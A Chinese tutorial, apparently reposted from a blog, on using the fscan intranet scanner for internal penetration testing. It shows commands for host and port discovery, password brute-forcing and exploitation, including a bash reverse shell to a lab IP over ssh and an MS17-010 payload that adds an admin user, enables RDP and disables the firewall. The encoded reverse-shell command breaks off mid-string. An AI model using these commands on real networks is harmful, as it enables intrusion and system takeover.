内网扫描器Fscan的使用

2024-01-18 12:20
文章标签 使用 fscan 扫描器

本文主要是介绍内网扫描器Fscan的使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

简介

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

主要功能

1.信息搜集:
存活探测(icmp)
端口扫描
2.爆破功能:
各类服务爆破(ssh、smb、rdp等)
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、漏洞扫描:
netbios探测、域控识别
获取目标网卡信息
高危漏洞扫描(ms17010等)
4.Web探测功能:
webtitle探测
web指纹识别(常见cms、oa框架等)
web漏洞扫描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
redis写公钥或写计划任务
ssh命令执行
ms17017利用(植入shellcode),如添加用户等
6.其他功能:
文件保存

使用方法

完整参数

-c string #ssh命令执行
-cookie string #设置cookie
-debug int #多久没响应,就打印当前进度(default 60)
-domain string #smb爆破模块时,设置域名
-h string #目标ip: 192.168.11.11 | 192.168.11.11-255 |192.168.11.11,192.168.11.12
-hf string #读取文件中的目标
-hn string #扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string #设置扫描模式: -m ssh (default “all”)
-no #扫描结果不保存到文件中
-nobr #跳过sql、ftp、ssh等的密码爆破
-nopoc #跳过web poc扫描
-np #跳过存活探测
-num int #web poc 发包速率 (default 20)
-o string #扫描结果保存到哪 (default “result.txt”)
-p string #设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default “21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017”)
-pa string #新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-path string #fcgi、smb romote file path
-ping #使用ping代替icmp进行存活探测
-pn string #扫描时要跳过的端口,as: -pn 445
-pocname string #指定web poc的模糊名字, -pocname weblogic
-proxy string #设置代理, -proxy http://127.0.0.1:8080
-user string #指定爆破时的用户名
-userf string #指定爆破时的用户名文件
-pwd string #指定爆破时的密码
-pwdf string # 指定爆破时的密码文件
-rf string #指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
-rs string #redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent #静默扫描,适合cs扫描时不回显
-sshkey string #ssh连接时,指定ssh私钥
-t int #扫描线程 (default 600)
-time int #端口扫描超时时间 (default 3)
-u string #指定Url扫描
-uf string #指定Url文件扫描
-wt int #web访问超时时间 (default 5)
-pocpath string #指定poc路径
-usera string #在原有用户字典基础上,新增新用户
-pwda string #在原有密码字典基础上,增加新密码
-socks5 #指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
-sc #指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

简单使用

fscan.exe -h [IP] #默认使用全部模块
fscan.exe -h 192.168.1.1/16 #扫描B段
fscan.exe -h 192.168.x.x -h 192.168.1.1/24 //C段
fscan.exe -h 192.168.x.x -h 192.168.1.1/16 //B段
fscan.exe -h 192.168.x.x -h 192.168.1.1/8  //A段的192.x.x.1和192.x.x.254,方便快

在这里插入图片描述
加上netbios模块才会显示netbios的信息

 .\fscan64.exe -h 192.168.88.141 -m netbios

在这里插入图片描述
扫描后生成结果文件
扫描过后会生成一个result.txt的文件,扫描的详细情况都会保存在这个文件中。
在这里插入图片描述
若要更换扫描生成的文件的位置和文件名:

.\fscan.exe -h [目标IP] -o .\tmp\1.txt 	#默认保存在当前目录下

若想不把扫描结果保存到文件中只需要加上-no参数:

.\fscan.exe -h [目标IP] -no #-no参数要添加在IP的后面才能生效
3.2.1 以文件进行导入扫描

.\fscan64.exe -hf D:\LCstudy\内网渗透工具\fscan\ip.txt
.\fscan64.exe -hf .\ip.txt

#可以使用相对位置,也可以使用绝对位置
在这里插入图片描述
3.2.2 跳过相应IP进行扫描

.\fscan64.exe -h 192.168.88.1/24

未跳过IP扫描前

在这里插入图片描述
跳过扫描后
在这里插入图片描述3.2.3 对url进行扫描

.\fscan64.exe -u http://baidu.com

-uf 对指定文件内的URL进行扫描
在这里插入图片描述设置socke5代理

在这里插入图片描述
爆破功能

爆破使用
爆破功能简单使用的话直接使用即可默认调用,输入如下命令它会自动爆破扫描出来的服务

 .\fscan64.exe -h 192.168.88.130

对模块进行自定义文件爆破

.\fscan64.exe -h [IP] -m [模块] -p [模块对应的端口] -pwdf [密码文件] -userf [用户名文件]

-m的模块包含:

[mssql] [ms17010] [all] [portscan] [ftp] [smb] [netbios] [oracle] [redis][fcgi] [mem] [web] [ssh] [findnet] [icmp] [main] [rdp] [mgo] [cve20200796][webonly] [mysql] [psql]

对ssh模块进行爆破,并设置自定义文件爆破:

.\fscan64.exe -h 192.168.88.130 -m ssh -p 22 -pwdf .\pwd.txt -userf .\users.txt

-pwdf 、-userf 同样也是相对位置和绝对位置都可以使用。

注:在进行爆破的时候是按文件里面的顺序进行爆破的,这时ssh包含多个用户,只能爆破出来第一个,要把root类的管理权限高的用户名放在文本得最上面。

附加一个扫mysql服务的:

 .\fscan64.exe -h 192.168.88.143 -m mysql -np -nopoc

在这里插入图片描述
这里-np、-nopoc下面会介绍到。
使用navicat连接成功。
在这里插入图片描述连接的前提:你目标机要开启远程连接,

mysql开启远程连接:

grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;		#开启一个远程连接用户为root任意IP可以连接,密码时123456
flush privileges;	#刷新用户权限
select user,host from user;		#查看用户检查是否已经更改
4.3 跳过一些扫描进行爆破
-nobr 		#跳过sql、ftp、ssh等爆破
-nopoc 		#跳过web poc扫描
-np 		#跳过存活检测

执行命令

.\fscan64.exe -h 192.168.88.143 -m mysql -np -nopoc
这里就是跳过存活检测,和跳过web,poc检测的扫描对mysql进行爆破

在这里插入图片描述
跳过爆破:

.\fscan64.exe -h 192.168.88.143 -m mysql -nobr

在这里插入图片描述
这里就没有mysql的服务的爆破的用户和密码

爆破还可以结合代理 -proxy string参数

漏洞利用功能

使用ssh命令执行

.\fscan64.exe -h [目标IP] -c [执行的命令]

例如:

查看用户:

 .\fscan64.exe -h 192.168.88.130 -c whoami

在这里插入图片描述
ssh命令执行上线Necat
执行的命令:

bash -i >& /dev/tcp/192.168.0.120/5555 0>&1
编码后执行的命令(因为在powershell中执行的命令不能包含&&&):.\fscan64.exe -h 192.168.88.130  -c "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI

在这里插入图片描述注:若命令有变只需要将变化后执行的命令进行base64编码后,对上述编码后执行的命令中的base64编码进行替换即可。
MS17-010模块利用
添加用户:

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc add
执行此命令后会生成一个用户,用户名:sysadmin 密码:1qaz@WSX!@#4源码add的含义(若想看此文件详细源码https://github.com/shadow1ng/fscan/blob/main/Plugins/ms17010-exp.go)://msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off'

在这里插入图片描述

启用guest用户,并把guest用户添加到管理员组

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc guest
#启用后用户是guest 密码:1qaz@WSX!@#4

下载地址
https://github.com/shadow1ng/fscan

这篇关于内网扫描器Fscan的使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/618985

相关文章

中文分词jieba库的使用与实景应用(一)

知识星球:https://articles.zsxq.com/id_fxvgc803qmr2.html 目录 一.定义: 精确模式(默认模式): 全模式: 搜索引擎模式: paddle 模式(基于深度学习的分词模式): 二 自定义词典 三.文本解析   调整词出现的频率 四. 关键词提取 A. 基于TF-IDF算法的关键词提取 B. 基于TextRank算法的关键词提取

使用SecondaryNameNode恢复NameNode的数据

1)需求: NameNode进程挂了并且存储的数据也丢失了,如何恢复NameNode 此种方式恢复的数据可能存在小部分数据的丢失。 2)故障模拟 (1)kill -9 NameNode进程 [lytfly@hadoop102 current]$ kill -9 19886 (2)删除NameNode存储的数据(/opt/module/hadoop-3.1.4/data/tmp/dfs/na

Hadoop数据压缩使用介绍

一、压缩原则 (1)运算密集型的Job,少用压缩 (2)IO密集型的Job,多用压缩 二、压缩算法比较 三、压缩位置选择 四、压缩参数配置 1)为了支持多种压缩/解压缩算法,Hadoop引入了编码/解码器 2)要在Hadoop中启用压缩,可以配置如下参数

Makefile简明使用教程

文章目录 规则makefile文件的基本语法:加在命令前的特殊符号:.PHONY伪目标: Makefilev1 直观写法v2 加上中间过程v3 伪目标v4 变量 make 选项-f-n-C Make 是一种流行的构建工具,常用于将源代码转换成可执行文件或者其他形式的输出文件(如库文件、文档等)。Make 可以自动化地执行编译、链接等一系列操作。 规则 makefile文件

使用opencv优化图片(画面变清晰)

文章目录 需求影响照片清晰度的因素 实现降噪测试代码 锐化空间锐化Unsharp Masking频率域锐化对比测试 对比度增强常用算法对比测试 需求 对图像进行优化,使其看起来更清晰,同时保持尺寸不变,通常涉及到图像处理技术如锐化、降噪、对比度增强等 影响照片清晰度的因素 影响照片清晰度的因素有很多,主要可以从以下几个方面来分析 1. 拍摄设备 相机传感器:相机传

pdfmake生成pdf的使用

实际项目中有时会有根据填写的表单数据或者其他格式的数据,将数据自动填充到pdf文件中根据固定模板生成pdf文件的需求 文章目录 利用pdfmake生成pdf文件1.下载安装pdfmake第三方包2.封装生成pdf文件的共用配置3.生成pdf文件的文件模板内容4.调用方法生成pdf 利用pdfmake生成pdf文件 1.下载安装pdfmake第三方包 npm i pdfma

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

git使用的说明总结

Git使用说明 下载安装(下载地址) macOS: Git - Downloading macOS Windows: Git - Downloading Windows Linux/Unix: Git (git-scm.com) 创建新仓库 本地创建新仓库:创建新文件夹,进入文件夹目录,执行指令 git init ,用以创建新的git 克隆仓库 执行指令用以创建一个本地仓库的

【北交大信息所AI-Max2】使用方法

BJTU信息所集群AI_MAX2使用方法 使用的前提是预约到相应的算力卡,拥有登录权限的账号密码,一般为导师组共用一个。 有浏览器、ssh工具就可以。 1.新建集群Terminal 浏览器登陆10.126.62.75 (如果是1集群把75改成66) 交互式开发 执行器选Terminal 密码随便设一个(需记住) 工作空间:私有数据、全部文件 加速器选GeForce_RTX_2080_Ti

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运维场景中的应用,旨在帮助运维人员快速上手并熟练运用 Ansible。 1. Ansible的核心概念